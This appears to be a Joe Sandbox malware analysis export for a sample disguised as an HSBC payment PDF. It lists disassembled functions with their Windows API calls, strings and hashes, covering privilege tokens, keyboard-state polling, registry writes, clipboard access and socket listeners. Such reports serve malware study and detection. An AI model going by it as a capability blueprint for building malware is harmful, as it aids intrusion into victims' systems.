Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction ID: c1ca6a344bcdfaba0e974823023d667c19296b4d148af4653ab9434bf50545cf
Opcode Fuzzy Hash: c65cf632393a49513bea40c5a00901192d62317a1410f3ef3d84c68e5820f373
Instruction Fuzzy Hash: AE319671A40318BBEB206F619C49F7F7F6CEB48B50F10443AFA04EA1D1D6B45D11ABA9

Function 00458310 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 004587E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
Part of subcall function 004587E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
Part of subcall function 004587E1: GetLastError.KERNEL32 ref: 00458865

_memset.LIBCMT ref: 00458353
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 004583A5
CloseHandle.KERNEL32(?), ref: 004583B6
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004583CD
GetProcessWindowStation.USER32 ref: 004583E6
SetProcessWindowStation.USER32(00000000), ref: 004583F0
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0045840A

Part of subcall function 004581CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
Part of subcall function 004581CB: CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2

Strings

default, xrefs: 00458405
winsta0, xrefs: 004583C8
, xrefs: 00458362

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
Instruction ID: 3323b63beeccf06d974511bf231c05544c13643482a2b8641c754c26865e528a
Opcode Fuzzy Hash: 0ddeae3dc57cf593c62668a5198c180965c612a3f0a563ffd60b2d372adb3bab
Instruction Fuzzy Hash: F3814871900209BFDF119FA5DC45AEE7B78AF08305F14416EFC10B6262EF399A19DB28

Function 0046C75C Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0046C78D
FindClose.KERNEL32(00000000), ref: 0046C7E1
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C806
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0046C81D
FileTimeToSystemTime.KERNEL32(?,?), ref: 0046C844
__swprintf.LIBCMT ref: 0046C890
__swprintf.LIBCMT ref: 0046C8D3

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

__swprintf.LIBCMT ref: 0046C927

Part of subcall function 00423698: __woutput_l.LIBCMT ref: 004236F1

__swprintf.LIBCMT ref: 0046C975

Part of subcall function 00423698: __flsbuf.LIBCMT ref: 00423713
Part of subcall function 00423698: __flsbuf.LIBCMT ref: 0042372B

__swprintf.LIBCMT ref: 0046C9C4
__swprintf.LIBCMT ref: 0046CA13
__swprintf.LIBCMT ref: 0046CA62

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 0046C88A
%4d, xrefs: 0046C8CD
%02d, xrefs: 0046C91B, 0046C925, 0046C973, 0046C9C2, 0046CA11, 0046CA60

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction ID: 7d9c3182f1c50569ad22dcb29b7867164fdd6ce968260aea251e7ba13e5350ae
Opcode Fuzzy Hash: 77525ac0cfac28e2ae67cd84ccd41d374f9895f2458c58216a587ca322c69e5f
Instruction Fuzzy Hash: AFA13EB1504304ABC710EFA5C885DAFB7ECFF94708F40492EF585D6192EA38DA08CB66

Function 0046EF95 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 0046EFB6
_wcscmp.LIBCMT ref: 0046EFCB
_wcscmp.LIBCMT ref: 0046EFE2
GetFileAttributesW.KERNEL32(?), ref: 0046EFF4
SetFileAttributesW.KERNEL32(?,?), ref: 0046F00E
FindNextFileW.KERNEL32(00000000,?), ref: 0046F026
FindClose.KERNEL32(00000000), ref: 0046F031
FindFirstFileW.KERNEL32(*.*,?), ref: 0046F04D
_wcscmp.LIBCMT ref: 0046F074
_wcscmp.LIBCMT ref: 0046F08B
SetCurrentDirectoryW.KERNEL32(?), ref: 0046F09D
SetCurrentDirectoryW.KERNEL32(004B8920), ref: 0046F0BB
FindNextFileW.KERNEL32(00000000,00000010), ref: 0046F0C5
FindClose.KERNEL32(00000000), ref: 0046F0D2
FindClose.KERNEL32(00000000), ref: 0046F0E4

Strings

*.*, xrefs: 0046F048

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction ID: e0d4b25dfa95f140917fd6c0b332215adfde449a0ea65fd213ed944f24ec6cf3
Opcode Fuzzy Hash: 6ca42bdee5e764a2d4c938babfd9147ccfee36eb28773e9f100ec5c7d0d625b2
Instruction Fuzzy Hash: EC31E7325011187ADF14EFA4EC48AEF77AC9F44360F10057BE844D2191EB79DA88CB6E

Function 00480857 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00480953
RegCreateKeyExW.ADVAPI32(?,?,00000000,0048F910,00000000,?,00000000,?,?), ref: 004809C1
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00480A09
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00480A92
RegCloseKey.ADVAPI32(?), ref: 00480DB2
RegCloseKey.ADVAPI32(00000000), ref: 00480DBF

Strings

REG_QWORD, xrefs: 00480D00
REG_BINARY, xrefs: 00480D4D
REG_MULTI_SZ, xrefs: 00480B7A
REG_SZ, xrefs: 00480AD0
REG_DWORD, xrefs: 00480C83
REG_EXPAND_SZ, xrefs: 00480A2F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
Instruction ID: 75f0257f13d9dd97868b06569ad7b6a65722ecc89240c550ead6eefe92fcdcfb
Opcode Fuzzy Hash: ca1d39e7c3dcd50cd69e0756345bcbe67b5e5b1012420fcf5cc1910ba9abc4c2
Instruction Fuzzy Hash: 3E023A756106119FCB54EF15D841E2AB7E5FF89314F04886EF8899B3A2CB38EC45CB89

Function 004166E1 Relevance: 25.9, Strings: 20, Instructions: 889COMMON

Download Yara Rule

Strings

0EJ, xrefs: 0041673D
pGJ, xrefs: 00416751
0DJ, xrefs: 00416733
NO_START_OPT), xrefs: 0045114F
UTF16), xrefs: 004510CF
3cA, xrefs: 004168FF
LIMIT_RECURSION=, xrefs: 004511FC
ANYCRLF), xrefs: 004512FB
UTF), xrefs: 004510FA
ANY), xrefs: 004512DE
NO_AUTO_POSSESS), xrefs: 0045112E
BSR_ANYCRLF), xrefs: 0045131E
CRLF), xrefs: 004512C1
UCP), xrefs: 0045110D
BSR_UNICODE), xrefs: 00451338
0FJ, xrefs: 00416747
CR), xrefs: 00451287
LF), xrefs: 004512A4
LIMIT_MATCH=, xrefs: 00451170
_A, xrefs: 00451465, 0045150C, 004515B4

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID:
String ID: 0DJ$0EJ$0FJ$3cA$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)$pGJ$_A
API String ID: 0-559809668
Opcode ID: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction ID: 6096d484c95c14ad7aa8192e29e4e3e8d71b99b3f093478e4f466f6acf52d5c9
Opcode Fuzzy Hash: 6a8c43c5cd2287656802195d535ea908290b48d8ab3bfd826a36c9d68e310c78
Instruction Fuzzy Hash: 13727E75E002199BDB14CF59C8807EEB7B5FF48311F15816BE809EB291E7389E85CB98

Function 0046A1EF Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0046A20F
__swprintf.LIBCMT ref: 0046A231
CreateDirectoryW.KERNEL32(?,00000000), ref: 0046A26E
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0046A293
_memset.LIBCMT ref: 0046A2B2
_wcsncpy.LIBCMT ref: 0046A2EE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0046A323
CloseHandle.KERNEL32(00000000), ref: 0046A32E
RemoveDirectoryW.KERNEL32(?), ref: 0046A337
CloseHandle.KERNEL32(00000000), ref: 0046A341

Strings

\??\%s, xrefs: 0046A22B
:, xrefs: 0046A252
\, xrefs: 0046A247

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction ID: f10b276181cf8096dd79107661fba1eb4aa855f6953dd7c4d63ebe7d830bec3b
Opcode Fuzzy Hash: f5c4c2d66afbbd10ee5f85d9a25c73fd31d49a88663bd8fadf72adc8619a6d0a
Instruction Fuzzy Hash: 1E31C571500119ABDB20DFA0DC49FEF77BCEF88704F1044BAF908E2260E77496948B29

Function 0046001C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00460097
SetKeyboardState.USER32(?), ref: 00460102
GetAsyncKeyState.USER32(000000A0), ref: 00460122
GetKeyState.USER32(000000A0), ref: 00460139
GetAsyncKeyState.USER32(000000A1), ref: 00460168
GetKeyState.USER32(000000A1), ref: 00460179
GetAsyncKeyState.USER32(00000011), ref: 004601A5
GetKeyState.USER32(00000011), ref: 004601B3
GetAsyncKeyState.USER32(00000012), ref: 004601DC
GetKeyState.USER32(00000012), ref: 004601EA
GetAsyncKeyState.USER32(0000005B), ref: 00460213
GetKeyState.USER32(0000005B), ref: 00460221

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction ID: c6705f0abb03acfe1c66d12a8beead0d319d3067caf51b1e954f1b2a293a3a50
Opcode Fuzzy Hash: f2f36dec6c4a46bfceebef3e5bbc60e354e372eebad2095a13b7bb07ab711d72
Instruction Fuzzy Hash: 7F51BC2090478829FB35D7A098547EBBFB49F12380F08459F99C2566C3FA5C9A8CC75B

Function 004803DA Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004804AC

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0048054B
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004805E3
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00480822
RegCloseKey.ADVAPI32(00000000), ref: 0048082F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
Instruction ID: efbac3d2c4afa975f371ae5d5fee671ec22ce1fa5a9a6cb729be810612663562
Opcode Fuzzy Hash: eef4f06837c88c6333fe19f002081eafe954a4facf3daecfb412de137efda7e6
Instruction Fuzzy Hash: A5E16E71614200AFCB54EF25C891D2FBBE4EF89314B04896EF84ADB3A2D634ED45CB56

Function 00474164 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0047418B
EmptyClipboard.USER32 ref: 00474191
GlobalAlloc.KERNEL32(00000002,?), ref: 004741A6
CloseClipboard.USER32 ref: 00474245

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction ID: 6a8dd1f95291b63ae5b16d2a5a0d869dcb5166510358231783c1e180ef80644f
Opcode Fuzzy Hash: 0df1e9f21622c81d98583a297edaa4e67f2beae9162bbdb6d1b4a4ef07667aeb
Instruction Fuzzy Hash: CE2191352002109FDB00AF54EC09B6E7BA8EF44751F10847AF945E72A2EB38AC05CB5D

Function 00476283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004762DC
WSAGetLastError.WSOCK32(00000000), ref: 004762EB
bind.WSOCK32(00000000,?,00000010), ref: 00476307
listen.WSOCK32(00000000,00000005), ref: 00476316
WSAGetLastError.WSOCK32(00000000), ref: 00476330
closesocket.WSOCK32(00000000,00000000), ref: 00476344

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction ID: 9cc0b371228dcaf8913226d6fe42490e105b9b769aefcc5547ebbaeef9b3f94b
Opcode Fuzzy Hash: 146cf2852e84b98676a1cb8b53444c853230e893978cbd9bf0c490d800ba36be
Instruction Fuzzy Hash: 6521F2312006049FCB10FF64C845A6EB7BAEF44324F15856EEC1AA73D2C734AC05CB59

Function 00476747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
WSAGetLastError.WSOCK32(00000000), ref: 004767C7
bind.WSOCK32(00000000,?,00000010), ref: 00476800
WSAGetLastError.WSOCK32(00000000), ref: 0047680D
closesocket.WSOCK32(00000000,00000000), ref: 00476821

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction ID: 4f4fa4b069b112be458f20050bee2991dabce79e459f6d74e9331a247e2dcb9e
Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
Instruction Fuzzy Hash: E941D275A00600AFDB10BF258C86F6E77A89F45718F05C56EFA59BB3C3CA789D008799

Function 004580A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction ID: 8dae455e1ba13099d0d58f164bb34b259a0b96a713bdc7d240504e0717c8d456
Opcode Fuzzy Hash: 81dd5e2c95f6d95ffeb542e083d257e40e9b1a3105d490f338a4361df31bd442
Instruction Fuzzy Hash: EBF08C30200614AFEB104FA4EC8CE6B3BACEF4A755B10043EF90592251DF649C09DB64

Function 0046C397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0046C432
CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

CoUninitialize.OLE32 ref: 0046C6B7

Strings

.lnk, xrefs: 0046C3C6, 0046C3EE, 0046C3F8

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
